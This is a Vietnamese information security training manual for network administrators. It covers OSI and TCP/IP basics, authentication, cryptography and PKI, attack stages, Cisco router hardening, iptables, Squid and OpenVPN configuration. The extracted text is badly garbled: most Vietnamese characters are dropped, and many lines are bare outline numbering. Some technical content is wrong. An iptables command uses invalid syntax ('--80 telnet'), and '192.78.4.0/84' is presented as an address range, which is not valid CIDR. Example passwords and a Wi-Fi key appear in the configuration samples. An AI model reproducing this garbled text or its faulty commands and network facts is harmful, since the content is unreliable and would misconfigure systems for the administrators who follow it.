Professional Documents
Culture Documents
Ngy cp nht
Ngi cp nht
Ch thch
7/2012
Hong Tun t
First Release
7, 2012
7, 2012
Mc lc ti liu
I.
1.
2.
Mc ch ca ti liu ......................................................................................................... 9
Phm vi ti liu .................................................................................................................. 9
1.
2.
a.
b.
c.
d.
e.
f.
S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP. ......................................... 22
g.
3.
a.
b.
c.
4.
a.
b.
5.
Authorization ................................................................................................................... 31
a.
C bn v Authorization ............................................................................................................. 31
b.
6.
7.
a.
Confidentiality ............................................................................................................................ 34
b.
Integrity ....................................................................................................................................... 35
c.
Availability ................................................................................................................................. 35
8.
Mt m hc c bn .......................................................................................................... 36
a.
b.
Hm bm Hash ......................................................................................................................... 36
c.
d.
e.
f.
7, 2012
b.
c.
d.
ch ca cc dng tn cng......................................................................................................... 45
1.
3.
4.
5.
a.
b.
c.
d.
e.
6.
7.
a.
b.
Ci t: ........................................................................................................................................ 68
c.
Cu hnh Squid:........................................................................................................................... 70
d.
8.
a.
b.
9.
a.
b.
Thit lp cu hnh trn thit b Access Point v VPN Server 2003 ............................................ 83
c.
10.
H thng pht hin v ngn chn truy cp bt hp php IDS/IPS .......................... 100
a.
a.
11.
7, 2012
a.
b.
c.
d.
e.
f.
g.
h.
i.
j.
12.
a.
b.
c.
13.
14.
15.
a.
b.
c.
16.
a.
b.
Quy trnh tng quan xy dng chnh sch tng quan: .............................................................. 159
c.
d.
1.
a.
b.
c.
d.
e.
f.
g.
7, 2012
2.
3.
4.
5.
V.
a.
b.
c.
V d c bn ............................................................................................................................. 188
d.
e.
f.
g.
h.
b.
c.
d.
e.
f.
1.
7, 2012
2.
a.
b.
c.
3.
a.
b.
Lab S dng IBM App Scan Scan l hng bo mt trn Web ............................................. 234
4.
a.
b.
M hnh phn tch d liu chuyn nghip cho doanh nghip ................................................... 235
c.
d.
e.
5.
a.
b.
c.
6.
d.
S dng Wireshark phn tch gi tin v traffic ca h thng mng ..................................... 248
e.
Thut ng
Vit y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ATTT
Security
Mt vi thng tin
7, 2012
I.
7, 2012
MC CH V PHM VI TI LIU
1. Mc ch ca ti liu
L ti liu o to v An ton thng tin cho cc cn b vn hnh v qun tr mng ca
ABC.Cung cp y cho hc vin cc khi nim, m hnh h thng, cu hnh trin
khai cc gii php, qun l ri ro v nhiu kin thc khc v An ton thng tin.
2. Phm vi ti liu
L ti liu c vit ring cho kha hc An ton thng tin cho cc cn b ca ABC
II.
2.
H thng mng c bn
3.
4.
5.
Authorization
6.
7.
8.
Mt m hc c bn
7, 2012
7, 2012
T chc Institute for Security and Open Methodologies nh ngha Security l hnh
thc bo v, ni tch bit gia ti nguyn v nhng mi e ra.
2. H thng mng c bn
a. M hnh mng OSI
Khi mt ng dng hay mt dch v hot ng phc v cc nhu cu trao i thng tin
ca ngi dng, h thng mng s hot ng vic trao i thng tin c din ra
vi nhng quy tc ring.
Khi nhn vo si dy mng hay cc thit b khng dy con ngi s khng th hiu
c nhng nguyn tc truyn thng tin . d dng hiu cc nguyn tc, nguyn l
phc ph qu trnh nghin cu, pht trin ng dng cng nh khc phc s c mng t
chc tiu chun th gii dng m hnh OSI nh l mt tiu chun ISO.
M hnh OSI (Open Systems Interconnection Reference Model, vit ngn l OSI
Model hoc OSI Reference Model) - tm dch l M hnh tham chiu kt ni cc h
thng m - l mt thit k da vo nguyn l tng cp, l gii mt cch tru tng k
thut kt ni truyn thng gia cc my vi tnh v thit k giao thc mng gia chng.
M hnh ny c pht trin thnh mt phn trong k hoch Kt ni cc h thng m
(Open Systems Interconnection) do ISO v IUT-T khi xng. N cn c gi l M
hnh by tng ca OSI. (Ngun Wikipedia).
7, 2012
Mc ch ca m hnh OSI:
M hnh OSI phn chia chc nng ca mt giao thc ra thnh mt chui cc tng cp.
Mi mt tng cp c mt c tnh l n ch s dng chc nng ca tng di n, ng
thi ch cho php tng trn s dng cc chc nng ca mnh. Mt h thng ci t cc
giao thc bao gm mt chui cc tng ni trn c gi l "chng giao thc" (protocol
stack). Chng giao thc c th c ci t trn phn cng, hoc phn mm, hoc l t
hp ca c hai. Thng thng th ch c nhng tng thp hn l c ci t trong
phn cng, cn nhng tng khc c ci t trong phn mm.
M hnh OSI ny ch c ngnh cng nghip mng v cng ngh thng tin tn trng
mt cch tng i. Tnh nng chnh ca n l quy nh v giao din gia cc tng cp,
tc qui nh c t v phng php cc tng lin lc vi nhau. iu ny c ngha l cho
d cc tng cp c son tho v thit k bi cc nh sn xut, hoc cng ty, khc
nhau nhng khi c lp rp li, chng s lm vic mt cch dung ha (vi gi thit l
cc c t c thu o mt cch ng n). Trong cng ng TCP/IP, cc c t ny
thng c bit n vi ci tn RFC (Requests for Comments, dch st l " ngh
duyt tho v bnh lun"). Trong cng ng OSI, chng l cc tiu chun ISO (ISO
standards).
Thng th nhng phn thc thi ca giao thc s c sp xp theo tng cp, tng t
nh c t ca giao thc ra, song bn cnh , c nhng trng hp ngoi l, cn
c gi l "ng ct ngn" (fast path). Trong kin to "ng ct ngn", cc giao
dch thng dng nht, m h thng cho php, c ci t nh mt thnh phn n,
trong tnh nng ca nhiu tng c gp li lm mt.
Vic phn chia hp l cc chc nng ca giao thc khin vic suy xt v chc nng v
hot ng ca cc chng giao thc d dng hn, t to iu kin cho vic thit k
cc chng giao thc t m, chi tit, song c tin cy cao. Mi tng cp thi hnh v
cung cp cc dch v cho tng ngay trn n, ng thi i hi dch v ca tng ngay
di n. Nh ni trn, mt thc thi bao gm nhiu tng cp trong m hnh OSI,
thng c gi l mt "chng giao thc" (v d nh chng giao thc TCP/IP).
M hnh tham chiu OSI l mt cu trc ph h c 7 tng, n xc nh cc yu cu cho
s giao tip gia hai my tnh. M hnh ny c nh ngha bi T chc tiu chun
ho quc t (International Organization for Standardization) trong tiu chun s 7498-1
Page | 12 Copyright by Tocbatdat
7, 2012
7, 2012
7, 2012
7, 2012
7, 2012
7, 2012
7, 2012
TCP/IP Model
4. Application
3. Transport
2. Internet
1. Network Access
Cu to gi tin IPv4
y l cu to ca gi
tin IPv4, gm phn
Header v data. Header
bao gm 160 hoc 192
bits phn cn li l Data.
Phn a ch l 32bits
Cu to gi tin IPv6:
Gi tin IPv6 cng gm hai
phn l Hearder v Data.
Phn Header ca gi tin
bao
gm
40
octec
(320bits), trong a ch
IPv6 l 128bit.
Cu to ca gi tin TCP:
7, 2012
7, 2012
Cu to ca gi tin TCP bao gm hai phn Header v Data. Trong phn Header l
192bit.
Ba bc bt u kt ni TCP:
+ Bc I: Client bn n Server mt gi
tin SYN
+ Bc II: Server tr li ti Client mt
gi tin SYN/ACK
+ Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v
qu trnh trao i thng tin gia hai my bt u.
Bn bc kt thc kt ni TCP:
+ Bc I: Client gi n Server mt gi tin
FIN ACK
+ Bc II: Server gi li cho Client mt gi
tin ACK
+ Bc III: Server li gi cho Client mt gi FIN ACK
+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v
Client c thc hin.
Cu to gi tin UDP:
G
i
t
i
UDP bao gm hai phn Header v Data, trong phn Header gm 64bit.
7, 2012
Cu to gi tin ICMP
Code (8 bits) [Mi Type c th c nhng code c th ring miu t cho dng
]
Port
20/21
22
23
25
53
69
80
110
161/162
443
445
135,137,139
1723,500
3389
f. S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP.
Thc hnh: Ci t Wireshark v Colasoft phn tch
7, 2012
Identification: Qu trnh nhn dng ngi dng, ngi dng cung cp cc thng tin
cho h thng nhn dng.
7, 2012
7, 2012
7, 2012
7, 2012
PAP -
7, 2012
Kerberos
L phng thc xc thc m User/Password khng c truyn i trn mng. (VD:
h thng Active Directory ca Microsoft s dng phng thc xc thc Kerberos).
Phng thc xc thc Kerberos c th c miu t ging nh chng ta i xem
phim:
7, 2012
+ u tin ngi dng phi c User/Password c thm quyn (i xem phim phi c
tin)
+ Ngi dng yu cu mt dch v (ngi xem cn xem mt b phim chiu lc
gi.)
+ Ngi dng a thm quyn ca mnh cho ngi xc thc (a tin mua v)
+ My ch KDC cung cp thm quyn truy cp dch v cho ngi dng (Phng v
a v cho ngi mua)
+ Ngi dng mang thm quyn c cp mang ti my ch dch v (ngi xem
phim a v ti phng chiu phim ngi xot v kim tra).
Kerberos c th c miu t cc bc nh sau:
Multi factor
L phng thc xc thc nhiu yu t.
V d s dng dch v ATM ca ngn hng bn cn c th ngn hng + mt khu
( l xc thc da vo 2 yu t). Ngoi ra mt s dch v s dng nhiu phng
thc xc thc kt hp nng cao mc bo mt.
Certificate
7, 2012
L phng thc xc thc rng ri trn Internet, cung cp kh nng xc thc an ton
cho ngi dng. Khi ni dung c m ha gi i, ch c Private Key mi gii m
c ni dung, v thng Private key khng c truyn i trn mng.
V d qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:
RSA
RSA phng thc xc thc t tin v an ton cho qu trnh xc thc v truyn
thng tin trn Internet. RSA khc phc mt s nhc im ca phng thc xc
thc Certificate. y l phng thc hay c s dng giao dch ngn hng.
Biometric
7, 2012
Phng thc xc thc s dng sinh trc hc nhn dng ngi dng nh dng:
Vn tay, tnh mch, vng mc, m thanh, khun mt xc thc ngi dng.
5. Authorization
a. C bn v Authorization
Authorization (Dch ting Vit: S cp quyn) l vic cp quyn cho ngi dng trong
mt h thng sau khi ngi dng xc thc (Authenticaion).
Authorization th hin cc quyn m ngi dng c th thc thi trn h thng.
Authorization lm vic trc tip vi iu khin truy cp Access Control
V d: Trn h thng Authorization ca Windows sau khi ngi dng ng nhp
(Authentication) h thng s cp quyn i vi:
-
File v Folder c NTFS Permmission: Quyn c, ghi, xa, chnh sa. chnh l
thm quyn ngi dng c cp i vi file v folder
7, 2012
7, 2012
IEEE 802.1x l chun cho wireless, s dng port ph thuc vo dch v cung cp xc
thc (authentication) v cp thm quyn (authorization) nh RADIUS v TACACS+.
Giao thc ny c th c s dng bo mt cho cc giao thc WPA/WPA2.
Ngoi ra IPsec cng l mt giao thc kh ph bin c s dng kt hp vi IEEE
802.1x cung cp bo mt cho h thng mng.
thnh t chnh
sau pht
7, 2012
a. Confidentiality
Tnh mt ca thng tin la mc bo mt cn thit nhm m bo nhng d liu quan
trng khng b r r hay l thng tin.
7, 2012
b. Integrity
Tnh ton vn ca thng tin l mc bo mt cn thit nhm m bo tin tng
ca thng tin khng b thay i hay ch c chnh sa bi ngi c thm quyn.
K tn cng c th thc hin nhiu phng thc nhm thay i nhng thng tin mong
mun. Nhng phng thc c th l t nhp vt qua cc qu trnh xc thc, hoc
tn cng khai thc l hng bo mt ca h thng.
y l mc bo mt thng tin quan trng, hng nm c rt nhiu t chc doanh
nghip b tn cng khai thc l hng bo mt v b thay i d liu.
Tnh ton vn ca thng tin c i din bi quyn MODIFY.
c. Availability
Cho ti truy cp d liu ca bn
Hy bt my tnh ca ti ln trc
Kh nng p ng ca thng tin l iu rt quan trng, iu ny th hin tnh sn sng
phc v ca cc dch v.
Kh nng p ng ca h thng chu nh hng bi kh nhiu thnh phn: c th l
phn cng, phn mm hay h thng Backup.
Kh nng p ng ca h thng cn c tnh n da trn s ngi truy cp v mc
quan trng ca d liu.
7, 2012
8. Mt m hc c bn
a. Khi nim c bn v mt m hc
Mt h thng m ha (cipher system) cung cp mt phng php bo v thng tin
bng vic m ha chng (encrypting) thnh mt dng m ch c th c bi ngi c
thm quyn vi h thng hay mt ngi dng c th. Vic s dng v to h thng
gi l mt m (cryptography).
Mt m c s dng t rt sm trong lch s loi ngi, trc khi c CNTT c rt
nhiu phng thc m ha c s dng.
V d: M ha kinh thnh, m ha Caesa, trong chin tranh th gii th 2 qun i c
s dng c my m ha bng c hc bo v cc bc th trong chin trng.
Ngnh cng nh thng tin c cc phng thc m ha c bn sau:
- Hm bm HASH
-
M ha i xng Symmetric
M ha bt i xng Assymmetric
Encrypt: Qu trnh m ha
b. Hm bm Hash
Hash l mt phng php hay thut ton c s dng kim tra tnh ton vn ca
d liu, kim tra s thay i ca d liu.
Hash c hai thut ton c bit ti nhiu nht: SHA v MD5.
Page | 36 Copyright by Tocbatdat
7, 2012
Khi d liu c truyn trn mng hay lu tr hon ton c th b thay i, ngi nhn
thng tin mun kim tra xem d liu c cn ton vn hay khng th ch cn kim tra
chui Hash ca d liu ban u v d liu nhn c. S dng hm bm kim tra
nu hai chui Hash ging nhau th d liu vn cn ton vn cha b chnh sa v ngc
li.
Thc hnh: S dng MD5 hash mt file
c. M ha i xng Symmetric
Symmetric Key Cryptography l mt h thng m ha s dng mt key m ha
v gii m.
Phng php m ha ny c u im l d dng s dng v tch hp hn l phng
thc m ha bt i xng (Assymmetric). V tc m ha v gii m cng nhanh hn
phng thc m ha bt i xng. Tuy nhin do c qu trnh m ha v gii m s
dng mt Key nn thng key c thit lp sn hai u ngi gi v ngi nhn
(vd: IPsec), hay thng tin c chia s c m ha v ch c ngi c key mi m ra
c.
M ha i xng thng c s dng m ha d liu, cn m ha bt i xng
thng c dng cho xc thc v truyn key.
C rt nhiu thut ton m ha i xng nhng hay dng nht hin nay l thut ton
AES (Advanced Encrypt Standard).
d. M ha bt i xng Assymmetric
Assymmetric Key Cryptography l mt h thng m ha s dng mt cp key: Public
key v Private Key thc hin cho qu trnh m ha v gii m.
Thng thng h thng ny hay s dng Public key m ha v s dng Private Key
gii m:
7, 2012
7, 2012
PKIX Working Group ca t chc IETF pht trin chun Internet cho PKI da trn
chun X.509 v Certificate, v c trng tm:
-
Operational Protocols
7, 2012
Ni PKIX c pht trin da trn Internet Standards X.509, Public Key Cryptography
Standard (PKCS) l phng thc m ha d liu c pht trin v cng b bi RSA
Lab, hin nay l mt phn ca hng RSA. Trong c 15 ti liu c th v PKCS, v
d:
- PKCS #1 RSA Cryptography Standard cung cp xut v trin khai h thng mt
m Public Key da trn thut ton RSA
-
PKCS #15:
7, 2012
CA l thnh phn quan trng trong khi nim v h thng PKI. Cc nh cung cp
CA v nh VeriSign hay Entrust. L h thng cung cp Certificate.
-
Digital Certificates
Chng ch s l d liu bao gm public key cryptography, hu ht Certificate u
da trn cu trc ca chun X.509. bao gm
Certificate Policies
L chnh sch cho chng ch s, nhn din vic s dng chng ch s. Nhng thng
tin c th nh:
S dng bo v thng tin vi CA
Phng thc xc thc vi CA
Qun l Key
Qun l s dng Private Key
Thi gian s dng chng ch s
Cp mi
Cho php exporrt private key
di ti thiu ca Public key v Private Key
7, 2012
V d trn VeriSign l CA, Thawte SGC CA l CSP v thng tin s dng cho dch
v accounts ca Google.
-
Trust models
H thng PKI c cu trc n gin l c mt CA. Mt CA trong cu trc cho php
to v qun l chng ch s nhng m hnh ny ch p dng i vi cc t chng
nh bi v tnh n gian. Nhng nu CA li ton b h thng s dng dch v
u b li. gim thiu ri ro cho h thng PKI cho php xy dng h thng c
cu trc bao gm Root CA l tng trn cng sau l cc tng CA con, gia CA
con c qun l khi b li c th xy dng li n gin. l h thng Trust
Models
a. bc c bn ca mt cuc tn cng
Thng thng mt cuc tn cng c chia lm cc bc c bn nh di y:
7, 2012
Bc 2: Scan
Bc th hai thc hin sau khi xc nh c mc tiu. Bc Scan nhm mc
tiu xc nh c cc k h ca i tng. T lp bng lit k c ton b cc
yu t c th thc hin xm nhp vo h thng.
Bc 3: Gaining Accesss
Khi pht hin c cc im yu ca h thng, k tn cng la chn mt hoc
nhiu l hng t tin hnh tn cng v chim quyn iu khin.
Bc 4: Maintaining Access
Khi thc hin tn cng thnh cng, ln sau truy cp vo h thng n gin hn
k tn cng thng s dng Virus, Trojan, backdoor hay nhng on shell code.
7, 2012
Bc 5: Clearing Track
K tn cng thc hin xa nhng du vt truy cp ca mnh nh vic xa log.
Threat
Mt hnh ng hay mt tnh hung c th nh hng ti bo mt. Threat l mt
nguy c nh hng ti bo mt ca h thng
Vulnerability
L l hng bo mt ca h thng.
Target of Evaluation
L mt h thng cng ngh thng tin l ch ca cuc tn cng
Attack
Tn cng h thng mng c th c chia lm hai dng:
+ Active Attack
+ Passive Attack
Tn cng h thng c th c chia lm nhiu dng khc. Ly thng tin, thay i
thng tin hay ph hy thng tin l nhng mc ch c bn nht ca cc cuc tn
cng
Exploit
L hnh thc khai thc l hng bo mt
Brute Force
L phng thc tn cng m k tn cng s dng nhng password n gin th
ln lt nhm on ra mt khu ca ngi dng. Phng thc ny ch p dng i
vi nhng mt khu n gin.
Dictionary
L phng thc tn cng tng t Brute force nhng thay v th ln lt mt khu
,k tn cng s dng b t in cha mt khu cn th.
Spoofing
7, 2012
DoS
L dng tn cng m mt ngi hay mt h thng lm cho mt h thng khc
khng th truy cp hoc b chm i ng k bng cch s dng ht cc ti nguyn.
Man-in-the-middle
K tn cng bng mt cch no ng gia lung cng ng gia giao tip ca
hai my tnh.
Replay
V d: khi mt qu trnh xc thc c thc hin thnh cng v b k tn cng
capture c qu trnh . Khi cn ng nhp vo h thng, k tn cng pht li
lung traffic thc hin xc thc. l phng thc tn cng Replay
Sesion Hijacking
Khi ngi dng thc hin thnh cng qu trnh xc thc, k tn cng thc hin tn
cng cp phin giao tip. Dng tn cng l Session Hijacking.
d. ch ca cc dng tn cng
Cc dng tn cng c chia theo ch ca dng tn cng :
o Operating System: ch tn cng l cc h iu hnh. Ngy nay cc h iu hnh
rt phc tp vi nhiu serivice, port, nhiu ch truy cp. Vic v cc l hng
bo mt ngy cng phc tp v i khi vic cp nht khng c thc hin. K
tn cng thc hin khai thc cc l hng bo mt trn cc h iu hnh .
o Application: ch tn cng l cc ng dng. Cc ng dng c pht trin bi
cc hng phn mm c lp v i khi ch quan tm ti p ng nhu cu cng
vic ca ng dng m qun i vic phi bo mt cho ng dng. Rt nhiu ng
dng c l hng bo mt cho php hacker khai thc.
o Shrink Wrap: Cc chng trnh, ng dng i khi b l m code v vic ny
cng l l hng bo mt rt ln.
o Misconfiguration: cc thit lp sai trn h thng i khi to k h cho k tn
cng thc hin khai thc.
7, 2012
III.
7, 2012
7, 2012
Tnh nng yu cu
Tnh nng
VD1: Chng ta khng th xy dng gii php hng triu $ bo v cho mt my c nhn
khng quan trng c.
VD2: Chng ta cn bo v cho h thng web, u cn nhng tnh nng v Endpoint security
VD3: Chng ta khng th chim 50% Performance ca h thng cho cc chng trnh bo v
c.
Bt k doanh nghip hay t chc no cng khng th cng mt lc c th trin khai ton b
cc gii php bo mt, iu ny t ra cn phi c l trnh xy dng r rng. Mt l trnh xy
dng cn phi p ng tnh ph kn v tng thch gia cc gii php vi nhau trnh chng
cho v xung t. Mt n v c th da vo l trnh ny c th xy dng c mt h
tng CNTT p ng tnh bo mt.
Di y l l trnh cc bc cng nh gii php xy dng mt h thng mng m bo
tnh bo mt cao
7, 2012
7, 2012
7, 2012
4. Router v Switch
a. Chc nng ca Router
- Routing: thc hin vic Routing cc gi tin trn mng
- NAT: Thc hin NAT cc a ch IP t private public v ngc li
Page | 51 Copyright by Tocbatdat
7, 2012
- Access Control List: Cho php to cc Access Control List p ng yu cu chn port,
ip ca ngi qun tr.
b. Chc nng ca Switch
- Thc hin vic Switch cc gi tin Layer 2
c. Bo mt trn Switch
- Chia VLAN: Cho php to ra nhiu mng trn mt Switch, trnh c s bng n ca
Virus hay cc dng tn cng khc.
- Security Port: Gn c nh mt s a ch MAC vo mt port nht nh trn Switch, cho
php chn c cc dng tn cng nh MAC Spoofing, ARP Spoofing.
d. Bo mt trn Router
- Router l thit b rt quan trng trong m hnh mng, cho php routing, nat v to ra cc
ACLs bo v h thng mng t tng Gateway.
Lab: Ci t Packet Tracert 4.0 test mt s cu lnh trn Router.
Hiu v Access Control List
Trn Router Cisco to ra mt Access List (ch p dng cho a ch IP) s dng cu lnh:
7, 2012
To v p dng Extended Access Control List (cho php p dng cho port v IP).
Xem li h thng Log trn Router chng ta c th bit c h thng block hay nhng
ai truy cp vo Router.
e. Thit lp bo mt cho Router
t a ch IP trn mt Interface:
Router> Enable
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router
Router#configure terminal
Router(conf)#^Z
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
Router#configure terminal
Choose the size of the key modulus in the range of 360 to 2048
7, 2012
[OK]
Router(config)#
Router#configure terminal
Router(config)#^Z
Router#configure terminal
Router(config)#^Z
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#^Z
MarketingRouter#config terminal
7, 2012
20.0.20.1
MarketingRouter(config-line)#^Z
MarketingRouter#
FinanceRouter#config terminal
FinanceRouter(config-line)#^Z
FinanceRouter#
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)^Z
LEFT#
Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip unreachables
Router(config)#interface Serial 0
7, 2012
Router(config-if)#no ip unreachables
Router(config)#interface Serial 1
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Bo v Source Routing
Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#
Small Services
Router#config terminal
Router(config)#^Z
Router#
Chng Finger
Router#config terminal
Router(config)#^Z
Router#
Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#
7, 2012
Router#config terminal
Router(config)#no ip name-server
Router(config)#no snmp-server
Router(config)#^Z
7, 2012
7, 2012
Kim sot ngi s dng v vic truy cp ca ngi s dng. Kim sot ni dung
7, 2012
B lc packet cho php hay t chi mi packet m n nhn c. N kim tra ton b
on d liu quyt nh xem on d liu c tha mn mt trong s cc lut l ca
lc packet hay khng. Cc lut l lc packet ny l da trn cc thng tin u mi
packet (header), dng cho php truyn cc packet trn mng. Bao gm:
a ch IP ni xut pht (Source)
a ch IP ni nhn ( Destination)
Nhng th tc truyn tin (TCP, UDP, ICMP, IP tunnel )
Cng TCP/UDP ni xut pht
Cng TCP/UDP ni nhn
Dng thng bo ICMP
Giao din packet n
Giao din packet i
Firewall c th bc tch d liu trong gi tin Layer 6,7: Filetype, URL, Content,
Services, Application, User,..
d. Cc loi Firewall
Nu chia theo v tr t:
- Network Firewall: bo v cho c h thng mng
- Host Firewall: Bo v cho mt my tnh c ci t (thng c tch hp
trn OS hoc cc phn mm bo mt nh Anti-Virus, Endpoint Security).
- Web Firewall: C th l Network Firewall hoc Host Firewall c chc nng
bo v dch v web trc cc dng tn cng.
Nu theo nn tng hardware v software
- Software Firewall: Thng c ci t trn OS hoc l h iu hnh Linux tch
hp firewall mm
- Hardware Firewall: c ti u ha bng vic xy dng h iu hnh trn nn
tng phn cng ca hng nn hiu nng x l tt hn.
Nu theo kh nng x l gi tin
- Packet Filter: Hot ng Layer3 4 M hnh OSI. Cho php lc gi tin hai
lp ny, Firewall dng ny c th coi nh Acess Control List trn Router.
7, 2012
C nhng tnh nng Firewall c bn: Packet Filter, NAT, Statefull, VPN
H tr pht hin h thng mng (Host active, Service, Application, OS, Vulnerability).
Tch hp IPS mc su (cho php cu hnh, rule edit, Event Impact Flag)
7, 2012
7, 2012
7, 2012
7, 2012
Protocol
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
Service
FTP
SSH
TELNET
SMTP
NAME (DNS)
FINGER
HTTP
POP3
SUNRPC
HTTPS
SAMBA-SWAT
KDM
MYSQL
X11
7, 2012
Tip khi Yahoo Reply Packet v my bn th n cng s phi i qua Input Chain. ng
nhin l n phi ph hp c vi cc Rule th mi c vo my ca bn. Rc ri v phc tp
c y nh hi quan Ni Bi Air Port phi khng ?
Chng ta bt u thao tc vi nhng a ch IP nht nh. Chng hn nh bn mun ngn chn
tt c cc Packet n t 192.78.4.0
-s l tu chn ngn chn mt a ch IP hay DNS ngun. Tng t ta c dng lnh:
iptables -s 192.78.4.0
Nu bn mun x l cc Packet mt cch chi tit hn. Th tu chn -j s gip bn thc hin iu
nh: ACCEPT, DENY hay DROP (s dng kt hp vi tu chn -s nh)...Chc ti khng
cn phi a ra ngha ting vit ca 3 t ACCEPT, DENY, DROP na nh. Nu bn mun
DROP cc Packet t a ch 192.78.4.0 :
iptables -s 192.78.4.0 -j DROP
DENY hay ACCEPT cng tng t nh ;-p
Lnh n trn s b qua mi th n t 192.78.4.0
Chng ta cn c th b qua mt PC nht nh trn mt mng. Nu bn khng mun nhng PC
trong mng lin lc v ni chuyn vi PC hay lin lc ra ngoi. Bn ch cn thay i tham s
Input, Output v thay i tu chn -s, -d
Nu chng ta mun b qua yu cu phn hi Telnet t my PC ny. Trong trng hp ny c t
nht 3 giao thc c th c ch r: TCP, UDP v ICMP.
Tu chn -p c s dng ch r chi tit giao thc cn x l. Telnet l mt giao thc hot
ng trn Port 23/TCP ln chng ta s c dng lnh:
iptables -A INPUT -s 192.78.4.0 -p tcp --80 telnet -j DROP
Cc Command trn l thao tc cho 1 a ch IP (Single IP). Nu bn mun thao tc vi nhiu a
ch IP cng mt lc (Multi IP) th s c cht thay i nh nh sau:
- 192.78.4.0/84 = = > Tt cc cc IP t 192.78.4.0 cho n 192.78.4.84
Page | 66 Copyright by Tocbatdat
7, 2012
7, 2012
Hin trn Internet c rt nhiu Script cu hnh Rules cho Iptables rt tuyt. Bn c th Down
chng v p dng ngay trn h thng ca mnh lun. Cng c mt s cng c cu hnh Iptables
trn X .
Li kt
Bo mt lun l mt vn phc tp tn nhiu giy mc. Hy vng qua bi vit ny bn s hiu
v nm c cch s dng Iptables. Mi th u ch mang tnh cht tng i. V vy nu
mun giu cho h thng ca mnh an ton. Bn lun phi xem xt kim tra Firewall, cc
Bug...V lun trng thi trc chin mc cao nht...
7. Ci t v cu hnh SQUID lm Proxy Server
a. Linux SQUID Proxy Server:
-
b. Ci t:
-
7, 2012
Cc th mc mc nh ca squid:
/usr/sbin
/etc/squid
/var/log/squid
Ci t t source :
+ Ta c file source ca squid l squid-version.tar.gz, ta thc hin cc bc lnh
sau:
tar xzvf squid-version.tar.gz
cd squid-version
7, 2012
./configure
make
make install
Sau khi ta thc hin cc lnh trn, coi nh ta ci t xong squid.
c.
Cu hnh Squid:
7, 2012
7, 2012
d. Khi ng Squid:
-
Sau khi ci t v cu hnh li squid, ta phi to cache trc khi chy squid bng lnh:
squid z
Sau khi to xong th mc cache, ta khi ng v dng squid bng script nh sau:
/etc/init.d/squid star
/etc/init.d/squid stop
7, 2012
Sau khi squid khi ng, mun theo di v qun l vic truy cp ca cc client hay
nhng g squid ang hot ng cache nh th no, ta thng xuyn xem xt nhng file
sau y:
*** cache_log: bao gm nhng cnh bo v thng tin trng thi ca cache
*** store_log: bao gm nhng c s d liu v nhng thng tin g mi
c cp nht trong cache v nhng g ht hn
*** access_log: cha tt c nhng thng tin v vic truy cp ca client,
bao gm a ch ngun, ch n, thi gian
7, 2012
7, 2012
H tng kha cng khai - Public Key Infrastructure (PKI) c s dng gii quyt vn
ny. N da trn vic, mi bn s hu hai kha, mt kha cng khai (Public Key) c bit
n vi tt c mi ngi v mt kho ring (Private Key) c gi b mt. Qu trnh ny c
s dng bi OpenSSL, min ph v l phin bn ngun m ca SSL, c tch hp trong
OpenVPN, xc thc cc VPN cng mc trc khi tin hnh m ha d liu.
Hy xem nhng u im ca hai ch :
OpenVPN mode
Pre-shared keys
SSL
Ch mt m
i xng
Bt i
xng
Thc hin
D dng
Kh khn
Tc
Nhanh
Chm
CPU s dng
Thp
Cao
Trao i kha
Khng
Thay i mi kha m
Khng
xng/i
7, 2012
cd /etc/openvpn/easy-rsa/
source vars
./clean-all
#./build-ca
./build-key-server server
./build-dh
./pkitool --initca
./pkitool --server server
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/
Page | 77 Copyright by Tocbatdat
7, 2012
7, 2012
/etc/openvpn/ca.crt
/etc/openvpn/easy-rsa/keys/hostname.crt
/etc/openvpn/easy-rsa/keys/hostname.key
/etc/openvpn/ta.key
7, 2012
dev tap0
[file ca filename.crt phai chuan /etc/openvpn/]
[cert,key cung tuong tu]
;up "/etc/openvpn/up.sh br0"
;down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
;push "dhcp-option DOMAIN netpro.edu.vn"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2
user and group: cu hnh m ngi dng v nhm OpenVPN daemon thc hin
7, 2012
7, 2012
7, 2012
7, 2012
Cu hnh bo mt:
- Chn Security Mode l: WPA2 Personal
- Chn thut ton m ha cho giao thc WPA l: TKIP+AES
- Key khi cc thit b mun kt ni ti mng Wireless ny l: vnexperts.net
7, 2012
7, 2012
- SSID ti l VNEXPERTS.NET
7, 2012
- Dng chnh cng c trn Windows tm kim cc SSID ca mng Wireless. Ti thy c mng c
SSID l VNEXPERTS.NET nhn Connect g key nh va ri vo l hon thnh kt ni
Wireless
- Nhng sau khi kt ni chc chn bn vn cha truy cp c vo Internet
G Key truy cp
Hon tt kt ni
7, 2012
7, 2012
Gn a ch IP o cho cc kt ni VPN.
7, 2012
7, 2012
7, 2012
7, 2012
Nhn Next h thng s yu cu iu kin cho php kt ni bn nhn Add ri chn ti Windows
Group
